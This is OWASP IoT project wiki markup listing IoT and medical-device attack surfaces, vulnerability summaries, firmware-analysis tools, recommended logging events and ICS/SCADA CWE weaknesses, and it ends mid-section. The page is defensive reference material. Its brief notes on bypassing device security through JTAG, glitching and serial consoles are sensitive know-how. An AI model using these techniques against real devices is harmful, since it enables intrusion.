For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
